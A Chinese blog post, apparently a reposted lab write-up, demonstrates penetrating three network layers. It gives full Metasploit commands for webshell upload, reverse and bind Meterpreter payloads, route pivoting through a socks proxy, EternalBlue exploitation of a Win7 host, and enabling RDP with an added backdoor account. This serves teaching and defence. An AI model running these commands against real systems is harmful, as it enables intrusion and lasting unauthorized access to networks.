百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 优雅编程 > 正文

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

sinye56 2024-11-26 08:29 7 浏览 0 评论

内网

    • 前言
    • 1.实验简介
      • 网络拓扑图
    • 2.环境搭建
      • 第一层网络
      • 第二层网络
      • 第三层网络
    • 最后
      • 第一台Linux
      • 第二台Linux
    • 3.实验过程
      • 第一层靶机
      • 蚁剑连接
      • 进一步做内网渗透,上传msf后门
      • 生成一个名为mshell.elf的msf后门文件
      • 蚁剑把后门文件上传到Linux靶机
      • 返回msf 开启监听
      • Kail接受到MSF会话
      • 添加路由
      • 使用MSF建立socks代理
      • 第二层网络
    • 第三层网络
      • 添加路由
      • Win10远程桌面连接
      • 登陆成功

前言


近年来,攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜,攻击者在经常会企业的内网进行横向渗透,令防守方防不胜防。因此,我们应该严格控制好网络区域之间的访问规则,加大攻击横向渗透的阻力。本文由锦行科技的安全研究团队提供,旨在通过实验演示进一步了解攻击者是如何在多层内网进行的渗透。

没有耐心看完的看这里:

网络安全是一门大学问,要想理解透彻还得一步一步来,对此,我整理了一份小白走向渗透的知识总结,还有视频素材,可以对比着学习


需要的关注我:私信回复“资料”获取更多渗透测试、网络安全资料

1.实验简介

网络拓扑图

渗透机:win10+kali

第一层靶机 (外网web服务器): Linux

第二场靶机 (内网web服务器): Linux

第三层靶机 (内网办公机) : win7

用三层网络来模拟内外网环境,主要了解MSF、内网转发等。

2.环境搭建

第一层网络

把渗透机kali和win10网卡1设置选择VMnet1:


靶机Linux网卡1设置选择VMnet1,添加网卡2 设置选择VMnet2:

第二层网络

将第二台靶机Linux网卡1设置选择VMnet2,添加网卡2 设置选择VMnet3:

第三层网络

将靶机win7网卡1设置选择VMnet3:

再配置好各台机器对应IP即可。

最后

在第一台Linux和第二台Linux上搭建一个php上传页面,设为存在文件上传漏洞的web页面,以便后续的拿shell进行内网渗透。

第一台Linux

第二台Linux

3.实验过程

第一层靶机

win10访问http://192.168.85.131/直接上传一句话木马

蚁剑连接


进一步做内网渗透,上传msf后门

打开kali msfconsole 输入msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.85.128 LPORT=4444 -f elf > mshell.elf

生成一个名为mshell.elf的msf后门文件

蚁剑把后门文件上传到Linux靶机

返回msf 开启监听

use exploit/multi/handler 使用监听模块
set payload linux/x64/meterpreter/reverse_tcp 使用和木马相同的payload
set lhost 192.168.85.128 kaili 的ip
set lport 4444 木马的端口
run 执行


蚁剑打开虚拟终端cd到后门文件的目录下,执行后门文件,输入

chmod 777 mshell.elf 加执行权限
./mshell.elf 执行文件

Kail接受到MSF会话

输入ifconfig,发现第二层172.10.10.0/24网段

添加路由

background 将会话转到后台
route add 172.10.10.0/24 1
添加 172.10.10.0/24网段 使用session1
route print 查看路由表

使用MSF建立socks代理

use auxiliary/server/socks4a
set srvhost 192.168.85.128
set srvport 10080
run

配置socks4代理的相关客户端Proxychains
在配置文件/etc/proxychains.conf中添加:
socks4 192.168.85.128 10080
vi /etc/proxychains.conf

添加socks4 192.168.85.128 10080

这样利用proxychains启动的应用都可以带sock4代理,proxychains 为kali自带的,非MSF里的。

建立好代理后渗透机可以通过这台Linux当跳板机进入第二层网络

第二层网络

nmap探测存在web服务的主机

用proxychans启动nmap对第二层网段进行80端口扫描,执行proxychains nmap -sT -Pn -p 80 172.10.10.0/24

扫描发现55和56存在web服务,172.10.10.56即为第二层网络的ip

由于proxychains无法代理icmp的数据包,所以必须添加-sT -Pn参数,即不检测主机是否存活,直接进行端口tcp扫描。

脚本探测存活主机

在本地创建一个名为ping.sh的脚本,脚本内容如下:

#!/bin/bash
ip=”172.10.10.”
echo “ping log:” > ./ping.txt
for i in {1..254}
do
ping -c 1 -w 1 -W 1 $ip$i | grep -q “ttl=” && echo “$ip$i [yes]” >> ./ping.txt || echo “$ip$i [no]” >> ./ping.txt &
done
echo “wait 5s….”
sleep 5
cat ./ping.txt
cat ./ping.txt | wc -l

Kali进入session1会话,然后upload命令上传刚刚创建的脚本到靶机upload /root/ping.sh /var/www/hrml/upload

进入shell执行

python -c ‘import pty;pty.spawn(“/bin/bash”)’

创建一个完全交互式shell,后

Chmod 777 ping.sh
./ping.sh

可以看到172.10.10.0/24网段存活56.57两台

知道存活主机ip后就可以继续进入第二层内网主机

渗透机浏览器配置sock4a代理

蚁剑加代理连接

连接 http://172.10.10.56/upload/php1.php

进一步做内网渗透,继续上传msf后门

制作MSF后门

返回kali msf 输入

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4455 -f elf > mshell1.elf

生成 mshell1.elf后门文件

因为在内网跨网段时无法反向代理连接到渗透的机器,所以这里使用linux/x64/meterpreter/bind_tcp 这个payload进行正向代理连接。
蚁剑上传后门

蚁剑打开虚拟终端执行后门文件


返回会话

输入ifconfig 发现第三层网络的网段10.10.10.0/24

第三层网络

添加路由

background
route add 10.10.10.0/24 2
route print

进入session 2 上传 脚本 探测存活主机
注意把脚本的ip段修改成该网段再上传

探测到第三层网段的存活ip :10.10.10.101

proxychans 启动nmap对10.10.10.101的1-500端口扫描,执行
proxychains nmap -sT -Pn -p 1-500 10.10.10.101

发现445端口开启

尝试使用ms17-010
use windows/smb/ms17_010_eternalblue
set rhost 10.10.10.101
set payload windows/x64/meterpreter/bind_tcp
set lport 4466

Run ,存在445漏洞

执行成功,返回会话

开启3389远程桌面

run post/windows/manage/enable_rdp 开启远程桌面
run post/windows/manage/enable_rdp USERNAME=zzy PASSWORD=123qwe!@# 添加远程用户

将3389端口转回kali本地5555端口
portfwd add -l 5555 -p 3389 -r 10.10.10.101

Win10远程桌面连接

登陆成功

网络安全是一门大学问,要想理解透彻还得一步一步来,对此,我整理了一份小白走向渗透的知识总结,还有视频素材,可以对比着学习,大家下载就行

关注我、私信回复“资料”获取更多渗透测试、网络安全资料

好了,大概内网渗透流程就是这样子,喜欢本文的转发关注我~

相关推荐

程序员:JDK的安装与配置(完整版)_jdk的安装方法

对于Java程序员来说,jdk是必不陌生的一个词。但怎么安装配置jdk,对新手来说确实头疼的一件事情。我这里以jdk10为例,详细的说明讲解了jdk的安装和配置,如果有不明白的小伙伴可以评论区留言哦下...

Linux中安装jdk并配置环境变量_linux jdk安装教程及环境变量配置

一、通过连接工具登录到Linux(我这里使用的Centos7.6版本)服务器连接工具有很多我就不一一介绍了今天使用比较常用的XShell工具登录成功如下:二、上传jdk安装包到Linux服务器jdk...

麒麟系统安装JAVA JDK教程_麒麟系统配置jdk

检查检查系统是否自带java在麒麟系统桌面空白处,右键“在终端打开”,打开shell对话框输入:java–version查看是否自带java及版本如图所示,系统自带OpenJDK,要先卸载自带JDK...

学习笔记-Linux JDK - 安装&配置

前提条件#检查是否存在JDKrpm-qa|grepjava#删除现存JDKyum-yremovejava*安装OracleJDK不分系统#进入安装文件目...

Linux新手入门系列:Linux下jdk安装配置

本系列文章是把作者刚接触和学习Linux时候的实操记录分享出来,内容主要包括Linux入门的一些理论概念知识、Web程序、mysql数据库的简单安装部署,希望能够帮到一些初学者,少走一些弯路。注意:L...

测试员必备:Linux下安装JDK 1.8你必须知道的那些事

1.简介在Oracle收购Sun后,Java的一系列产品就被整合到Oracle官网中,打开官网乍眼一看也不知道去哪里下载,还得一个一个的摸索尝试,而且网上大多数都是一些Oracle收购Sun前,或者就...

Linux 下安装JDK17_linux 安装jdk1.8 yum

一、安装环境操作系统:JDK版本:17二、安装步骤第一步:下载安装包下载Linux环境下的jdk1.8,请去官网(https://www.oracle.com/java/technologies/do...

在Ubuntu系统中安装JDK 17并配置环境变量教程

在Ubuntu系统上安装JDK17并配置环境变量是Java开发环境搭建的重要步骤。JDK17是Oracle提供的长期支持版本,广泛用于开发Java应用程序。以下是详细的步骤,帮助你在Ubuntu系...

如何在 Linux 上安装 Java_linux安装java的步骤

在桌面上拥抱Java应用程序,然后在所有桌面上运行它们。--SethKenlon(作者)无论你运行的是哪种操作系统,通常都有几种安装应用程序的方法。有时你可能会在应用程序商店中找到一个应用程序...

Windows和Linux环境下的JDK安装教程

JavaDevelopmentKit(简称JDK),是Java开发的核心工具包,提供了Java应用程序的编译、运行和开发所需的各类工具和类库。它包括了JRE(JavaRuntimeEnviro...

linux安装jdk_linux安装jdk软连接

JDK是啥就不用多介绍了哈,外行的人也不会进来看我的博文。依然记得读大学那会,第一次实验课就是在机房安装jdk,编写HelloWorld程序。时光飞逝啊,一下过了十多年了,挣了不少钱,买了跑车,娶了富...

linux安装jdk,全局配置,不同用户不同jdk

jdk1.8安装包链接:https://pan.baidu.com/s/14qBrh6ZpLK04QS8ogCepwg提取码:09zs上传文件解压tar-zxvfjdk-8u152-linux-...

运维大神教你在linux下安装jdk8_linux安装jdk1.7

1.到官网下载适合自己机器的版本。楼主下载的是jdk-8u66-linux-i586.tar.gzhttp://www.oracle.com/technetwork/java/javase/downl...

window和linux安装JDK1.8_linux 安装jdk1.8.tar

Windows安装JDK1.8的步骤:步骤1:下载JDK打开浏览器,找到JDK下载页面https://d.injdk.cn/download/oraclejdk/8在页面中找到并点击“下载...

最全的linux下安装JavaJDK的教程(图文详解)不会安装你来打我?

默认已经有了linux服务器,且有root账号首先检查一下是否已经安装过java的jdk任意位置输入命令:whichjava像我这个已经安装过了,就会提示在哪个位置,你的肯定是找不到。一般我们在...

取消回复欢迎 发表评论: